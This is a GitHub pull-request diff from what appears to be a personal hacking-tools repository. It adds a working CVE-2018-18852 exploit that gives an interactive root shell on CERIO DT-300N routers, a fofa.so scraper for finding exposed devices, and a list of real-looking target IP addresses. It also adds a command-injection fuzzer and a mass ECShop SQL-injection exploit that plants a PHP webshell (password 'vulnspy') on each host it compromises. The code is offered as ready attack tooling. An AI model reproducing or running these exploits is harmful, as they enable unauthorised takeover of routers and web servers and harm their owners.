Skip to content
Open

1 #1

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
80 commits
Select commit Hold shift + click to select a range
8a2120b
hack the python by jiu
jiushill May 26, 2018
4e4c526
Update README.txt
jiushill May 26, 2018
a103997
Update README.txt
jiushill May 27, 2018
ac09146
Add files via upload
jiushill Jun 9, 2018
c119ace
Create exploitsearch
jiushill Jul 1, 2018
cfc561b
Delete exploitsearch
jiushill Jul 1, 2018
22a8109
Add files via upload
jiushill Jul 1, 2018
e023d9b
Update README.txt
jiushill Jul 1, 2018
8538a00
Add files via upload
jiushill Jul 16, 2018
db6a776
Add files via upload
jiushill Jul 19, 2018
0ea6982
Update README.txt
jiushill Jul 19, 2018
956057b
Update url.txt
jiushill Jul 19, 2018
4af33cf
Add files via upload
jiushill Jul 31, 2018
a4d948b
Add files via upload
jiushill Jul 31, 2018
8ab1b18
Update README.txt
jiushill Jul 31, 2018
4cb29db
Add files via upload
jiushill Aug 1, 2018
0b48f73
Update README.txt
jiushill Aug 1, 2018
69cecb4
Add files via upload
jiushill Aug 9, 2018
6c151e7
Update README.txt
jiushill Aug 9, 2018
0244172
Add files via upload
jiushill Aug 12, 2018
b80ee0a
Update README.txt
jiushill Aug 12, 2018
018eec2
Add files via upload
jiushill Aug 19, 2018
bd51740
Add files via upload
jiushill Aug 19, 2018
ab9b8a3
Add files via upload
jiushill Sep 7, 2018
ed71091
Update README.txt
jiushill Sep 7, 2018
b941b43
Add files via upload
jiushill Sep 16, 2018
2fa013c
Update README.txt
jiushill Sep 16, 2018
978bd17
Add files via upload
jiushill Nov 15, 2018
34609a0
Update README.txt
jiushill Nov 15, 2018
7e9e942
Add files via upload
jiushill Dec 2, 2018
1a5e439
Update README.txt
jiushill Dec 2, 2018
173d504
Add files via upload
jiushill Dec 14, 2018
1dc2f9a
Update README.txt
jiushill Dec 14, 2018
43f6fd4
Add files via upload
jiushill Dec 30, 2018
06e71d5
Update README.txt
jiushill Dec 30, 2018
dbd8ddf
Add files via upload
jiushill Jan 4, 2019
82cec31
Update README.txt
jiushill Jan 4, 2019
18fc9d8
Add files via upload
jiushill Jan 11, 2019
8e20c34
Update README.txt
jiushill Jan 11, 2019
9167733
Add files via upload
jiushill Jan 19, 2019
d6d2aed
Add files via upload
jiushill Jan 19, 2019
cac59d0
Update README.txt
jiushill Jan 19, 2019
85242e1
Add files via upload
jiushill Jan 24, 2019
a8900e3
Update README.txt
jiushill Jan 24, 2019
d5ca1b8
Add files via upload
jiushill Jan 25, 2019
c426904
Update README.txt
jiushill Jan 25, 2019
a8db081
Update README.txt
jiushill Jan 27, 2019
8bcccc3
Add files via upload
jiushill Jan 27, 2019
d99aa35
Add files via upload
jiushill Jan 30, 2019
592df02
Update README.txt
jiushill Jan 30, 2019
3010791
Delete save2text.txt
jiushill Jan 31, 2019
dfcba92
Delete domain.txt
jiushill Jan 31, 2019
82c6658
Delete save2name.txt
jiushill Jan 31, 2019
c8ce9fc
Delete save2host.txt
jiushill Jan 31, 2019
01e0587
Delete save_2.txt
jiushill Jan 31, 2019
18feb22
Add files via upload
jiushill Feb 2, 2019
dfb72b8
Update README.txt
jiushill Feb 2, 2019
05b0354
Add files via upload
jiushill Feb 3, 2019
1863d43
Update README.txt
jiushill Feb 3, 2019
08e370f
Add files via upload
jiushill Feb 8, 2019
0ae839d
Update README.txt
jiushill Feb 8, 2019
c8f7c47
Update README.txt
jiushill Feb 8, 2019
de0b336
Update README.txt
jiushill Feb 8, 2019
6231930
Add files via upload
jiushill Feb 12, 2019
f34dfe0
Add files via upload
jiushill Feb 12, 2019
6e10299
Update README.txt
jiushill Feb 12, 2019
612f53a
Add files via upload
jiushill Feb 14, 2019
06eaf1a
Update README.txt
jiushill Feb 14, 2019
67dcabf
Add files via upload
jiushill Feb 16, 2019
8a8987b
Update README.txt
jiushill Feb 16, 2019
1b951c7
Update README.txt
jiushill Feb 16, 2019
411cc77
Add files via upload
jiushill Feb 17, 2019
f306561
Add files via upload
jiushill Feb 27, 2019
dab3cb4
Update README.txt
jiushill Feb 27, 2019
44cacfd
Add files via upload
jiushill Mar 4, 2019
5f42e8d
Update README.txt
jiushill Mar 4, 2019
501b3ac
Update README.txt
jiushill Mar 4, 2019
be3d155
Add files via upload
jiushill Mar 4, 2019
786ca31
Add files via upload
jiushill Mar 11, 2019
4ab2f1d
Update README.txt
jiushill Mar 11, 2019
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
11 changes: 11 additions & 0 deletions CVE-2018-18852/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
如果你想获取测试IP:直接执行sousuo.py,他会从fofa.so抓取1页的IP

漏洞利用:
``````
python3 exp.py
填入漏洞的IP

端口

账户
``````
82 changes: 82 additions & 0 deletions CVE-2018-18852/exp.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,82 @@
#author:九世
#time:2019/1/30

import requests
import json
import base64

class Demo:
def __init__(self,headers,url,payload,url2):
self.headers=headers
self.url=url
self.payload=payload
self.url2=url2

def requet(self):
ver = 'DT-300N-NGS-M'
ver2='DT-300N'
version=''
vurl=''
rqt=requests.post(url=self.url,headers=self.headers,data=self.payload)
nurl=''
nersion=''
if rqt.status_code==requests.codes.ok:
print('[+] Router version number is {}'.format(ver))
while True:
rqt = requests.post(url=self.url, headers=self.headers, data=self.payload)
nurl+=rqt.url
nersion+=ver
nary=json.loads(rqt.content)
cmd = input('command:')
payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': nary['pid'], 'Times': 1}
self.command(self.url, headers, payload,nersion)

elif rqt.status_code==requests.codes.not_found: #判断状态码是否为404
print('[-] Router version number is not {}'.format(ver))
rqts=requests.post(url=self.url2,headers=headers,data=self.payload)
if rqts.status_code==requests.codes.ok:
print('[+] Router version number is {}'.format(ver2))
while True:
rqts = requests.post(url=self.url2, headers=headers, data=self.payload)
version+=ver2
vurl+=rqts.url
vary=json.loads(rqts.content)
cmd=input('command:')
payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': vary, 'Times': 1}
self.command(self.url2,headers,payload,version)
elif rqts.status_code==requests.codes.not_found:
print('[-] Router version number is not {}'.format(ver2))
exit()
elif rqts.status_code==requests.codes.unauthorized:
print('[-] Auth is invalid, try other creds')
exit()

def command(self,url,header,data,ver):
rsv=requests.post(url=url,headers=header,data=data)
if ver=='DT-300N':
print(rsv.text.split('/html')[1])
else:
print(rsv.text.split('[[[')[1])
if __name__ == '__main__':
print('[&] The version of CERIO that is vulnerable is as follows')
print('[!] CERIO DT-300N-NGS-M\n[!] CERIO DT-300N')
print('')
t=''
path='/cgi-bin/main.cgi?cgi=PING&mode=9'
path2='/cgi-bin/Save.cgi?cgi=PING'
user=input('host:').strip()
ports=input('port:').strip()
username=input('creds:').strip()
creds=bytes(base64.b64encode(bytes(username,encoding='utf-8'))).decode('utf-8')
if ports in '443':
t+='https://'
else:
t+='http://'


urls=t+user+':'+ports+path
urls2=t+user+':'+ports+path2
payload={'cgi':'PING','mode':9}
headers={'content-type': 'application/json', 'Host': user, 'Accept-Encoding': 'gzip, deflate','Content-Length': '0', 'Connection': 'keep-alive', 'Authorization': 'Basic {}'.format(creds)}
obj=Demo(headers=headers,payload=payload,url=urls,url2=urls2)
obj.requet()
10 changes: 10 additions & 0 deletions CVE-2018-18852/save.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
1.173.33.86
36.233.167.168
61.227.186.39
36.234.145.128
1.175.130.77
61.223.178.171
1.175.58.177
36.224.215.199
118.165.7.180
219.86.30.66
35 changes: 35 additions & 0 deletions CVE-2018-18852/sousuo.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
#author:九世
#time:2019/1/29

import requests
import os
import re
from bs4 import *


xj=open('save.txt','w')
xj.close()

class Fofa:
def __init__(self,headers,url):
self.headers=headers
self.url=url

def requet(self):
try:
rqt=requests.get(url=self.url,headers=self.headers)
zz=re.findall('<a target="_blank" href=".*">.* <i class="fa fa-link"></i></a>',rqt.text)
for z in zz:
href=BeautifulSoup(str(z),'html.parser')
for q in href.find_all('a'):
host=q.get('href')
print('[+]IP:'+str(host).replace('http://','').replace('https://','').lstrip())
print(str(host).replace('http://', '').replace('https://', '').lstrip(),file=open('save.txt','a'))
except Exception as r:
print('[!] Error {}'.format(r))

if __name__ == '__main__':
headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
url='https://fofa.so/result?qbase64=YXBwPSJjZXJpb19EVDMwME4i'
obj=Fofa(headers=headers,url=url)
obj.requet()
45 changes: 45 additions & 0 deletions Command injection/Commandinjection.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,45 @@
import requests
import optparse
import re


def main():
parser=optparse.OptionParser()
parser.add_option('-u',dest='zru',help='Used for fuzzy testing')
(options,args)=parser.parse_args()
if options.zru:
url=options.zru
fuzz(url)
else:
parser.print_help()
exit()

def fuzz(url):
cookies='PHPSESSID=70mpunbrle3mb6bfaiqieqf3p3;security=high'
cookie = {}
for k in str(cookies).strip().split(';'):
key, value = k.split('=', 1)
cookie[key] = value

urls=url
headers={'user-aegnt':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'}
payload=['|',';','||','&&','&']
payload_b=['-','$']
payload_c=['-']
payload_d=['$']
for p in payload:
for pb in payload_b:
for pc in payload_c:
for pd in payload_d:
pf=pc+pd
datas={'ip':'127.0.0.1{}i{}p{}c{}o{}n{}f{}i{}g'.format(p,pb,pb,pb,pb,pb,pb,pb),'Submit':'Submit'}
datas2={'ip': '127.0.0.1{}i{}p{}c{}o{}n{}f{}i{}g'.format(p, pf, pf, pf, pf, pf, pf, pf),'Submit': 'Submit'}
reqt=requests.post(url=urls,headers=headers,cookies=cookie,data=datas)
reqt2=requests.post(url=urls,headers=headers,cookies=cookie,data=datas2)
if 'Windows IP' in reqt.text:
print('[+] Bypass success URL:{} data:{}'.format(reqt.url,datas))
if 'Windows IP' in reqt2.text:
print('[+] Bypass success URL:{} data:{}'.format(reqt.url, datas))

if __name__ == '__main__':
main()
132 changes: 132 additions & 0 deletions Distinguish.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,132 @@
import requests
import re
import socket
from bs4 import BeautifulSoup
import optparse

def main():
parser=optparse.OptionParser()
parser.add_option('-p',dest='host',help='ip port scanner')
parser.add_option('-w',dest='whois',help='Whois query')
parser.add_option('-d',dest='dns',help='dns query')
parser.add_option('-z',dest='domain',help='Domain name query')
parser.add_option('-f',dest='fw',help='Bypass query')
(options,args)=parser.parse_args()
if options.host:
ip=options.host
portscanner(ip)
elif options.whois:
ws=options.whois
whois(ws)
elif options.dns:
dn=options.dns
dnsquery(dn)
elif options.domain:
domain=options.domain
domains(domain)
elif options.fw:
pz=options.fw
bypass(pz)
else:
parser.print_help()
exit()
def portscanner(ip):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket.setdefaulttimeout(1)
for port in range(1,65535):
try:
s.connect((ip,port))
print('[+]',ip,':',port,'open')
except:
pass

def whois(ws):
url = "http://whoissoft.com/{}".format(ws)
rest = requests.get(url=url)
csd = rest.content.decode('utf-8')
fsd = BeautifulSoup(csd, 'html.parser')
wsd = fsd.get_text()
comp = re.compile(
r'a:link, a:visited {.*? }|a:hover {.*?}|white-space: .*?;|font-family:.*?;|function\s+s|window.location.href\s+=\s+".*?"|return\s+false;| var _sedoq\s+=\s+_sedoq|_sedoq.partnerid\s+=\s+''316085'';| _sedoq.locale\s+=\s+''zh-cn'';|var\s+s\s+=\s+document.createElement|s.type\s+=\s+''text/javascript'';|s.async\s+=\s+true;|s.src\s+=\s+''.*?'';|var\s+f\s+=\s+document.getElementsByTagName|f.parentNode.insertBefore|/.*?/|pre\s+{|word-wrap:\s+break-word;|}|\s*\(str1\){|\s+\+\s+str1;|\s+\|\s+\|\|\s+{;|\s+\|\|\s+{;|_sedoq.partnerid|\s+=|''316085''|\s+'';|\s+enter\s+your\s+partner\s+id|_sedoq.locale\s+=\s+|zh-cn|language\s+locale|\(function\(\)\s+{|\[0\];|s.type|text/javascript|script|s,\s+f|document.getElementById\(.*?\)|.style.marginLeft|=window|\|\||\s+{|;|en-us,|en-uk,|de-de,|es-er-fr,|pt-br,|\s+.innerWidth2|es-|er-|fr|.innerWidth2|er|-,')
tih = re.sub(comp, "", wsd)
wrs = open('whois.txt', 'w')
wrs.write(tih)
wrs.close()
wrr = open('whois.txt', 'r')
rr = wrr.read()
xin = rr.replace("''", '')
xin2 = xin.replace("(", '')
xin3 = xin2.replace(")", '')
xin4 = xin3.replace("er-,", '')
xin5 = xin4.replace('.innWidth2+"px"', '')
xin6 = xin5.replace('window.onresize=function{', '')
xin7 = xin6.replace('.innWidth2+"px"', '')
print(xin7, end='')
def dnsquery(dn):
url = "https://jiexifenxi.51240.com/web_system/51240_com_www/system/file/jiexifenxi/get/?ajaxtimestamp=1526175925753"
headers = {
'user-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'}
params = {'q': '{}'.format(dn), 'type': 'a'}
reqst = requests.post(url=url, headers=headers, params=params)
content = reqst.content.decode('utf-8')
bd = BeautifulSoup(content, 'html.parser')

print('---[+]A record---')
print(bd.get_text())

print('---[+]MX record---')
params2 = {'q': '{}'.format(dn), 'type': 'mx'}
rest = requests.post(url=url, headers=headers, params=params2)
content2 = BeautifulSoup(rest.content.decode('utf-8'), 'html.parser')
print(content2.get_text())

print('---[+]CNAME record---')
params3 = {'q': '{}'.format(dn), 'type': 'cname'}
rest2 = requests.post(url=url, headers=headers, params=params3)
content3 = BeautifulSoup(rest2.content.decode('utf-8'), 'html.parser')
print(content3.get_text())

print('---[+]NS record---')
params4 = {'q': '{}'.format(dn), 'type': 'ns'}
rest3 = requests.post(url=url, headers=headers, params=params4)
content4 = BeautifulSoup(rest3.content.decode('utf-8'), 'html.parser')
print(content4.get_text())

print('---[+]TXT record---')
params5 = {'q': '{}'.format(dn), 'type': 'txt'}
rest4 = requests.post(url=url, headers=headers, params=params5)
content5 = BeautifulSoup(rest4.content.decode('utf-8'), 'html.parser')
print(content5.get_text())

def domains(domain):
print('---[+]Domain name query---')
url = "http://i.links.cn/subdomain/"
headers = {'user-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'}
params = {'domain': '{}'.format(domain), 'b2': '1', 'b3': '1', 'b4': '1'}
reqst = requests.post(url=url, headers=headers, params=params)
vd = reqst.content.decode('gbk')
rw = re.findall('<div class=domain><input type=hidden name=.*? id=.*? value=".*?">', vd)
rw2 = "".join(str(rw))
bwdw = BeautifulSoup(str(rw2), 'html.parser')
pw = bwdw.find_all('input')
for l in pw:
isd = l.get("value")
print(isd)

def bypass(pz):
url = "http://www.webscan.cc/?action=query&ip={}".format(pz)
headers = {
'user-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16'}
wd = requests.get(url=url, headers=headers)
rcy = wd.content.decode('utf-8')
res = re.findall('"domain":".*?"', str(rcy))
lis = "".join(res)
rmm = lis.replace('"', '')
rmm2 = rmm.replace(':', '')
rmm3 = rmm2.replace('/', '')
rmm4 = rmm3.replace('domain', '')
rmm5 = rmm4.replace('http', '')
print(rmm5)

if __name__ == '__main__':
main()
59 changes: 59 additions & 0 deletions ECShop-exploit/eschop-exp.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
import requests
import threading
import os
import re
import time

xj=open('save.txt','w')
xj.close()

cz=[]
def exploit(url):
url=url+'/user.php'
header={'Referer': '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'}
data={'action':'login','vulnspy':'phpinfo();exit;'}
try:
reqt=requests.post(url=url,headers=header,data=data,timeout=10)
if 'PHP Version' in reqt.text:
print('[+] Remote code execution high-risk vulnerabilities url:{}'.format(reqt.url))
print('[+] Remote code execution high-risk vulnerabilities url:{}'.format(reqt.url),file=open('save.txt','a'))
cz.append(reqt.url)
else:
print('[-] Not debug url:{}'.format(reqt.url))
except Exception as g:
print('[-] Error {}'.format(g))

if len(cz)>0:
print('[+] start getshell')
else:
print('[-] not debug,Unable to getshell')
exit()


getshellpayloads={'action':'login','vulnspy':'eval(base64_decode($_POST[d]));exit;','d':'ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8+Jyk7'}

for t in cz:
tx=re.sub('/user.php','',str(t))
try:
reqts2=requests.post(url=t,headers=header,data=getshellpayloads)
reqts3=requests.post(url=tx+'/vulnspy.php?vulnspy=phpinfo();')
if 'PHP Version' in reqts3.text:
print('[+] Getshell success url:{} password:{}'.format(reqts3.url, 'vulnspy'))
print('[+] Getshell success url:{} password:{}'.format(reqts3.url,'vulnspy'),file=open('save.txt','a'))
else:
print('[-] Getshell failure url:{}'.format(reqts3.url))
except Exception as p:
print('[-] Error {}'.format(p))
if __name__ == '__main__':
user = input('file:')
if os.path.exists(user):
print('[+] file {} ok'.format(user))
else:
print('[-] not file {}'.format(user))
exit()

dk=open('{}'.format(user),'r')
for d in dk.readlines():
qc="".join(d.split('\n'))
t=threading.Thread(target=exploit,args=(qc.rstrip('/'),))
t.start()
Loading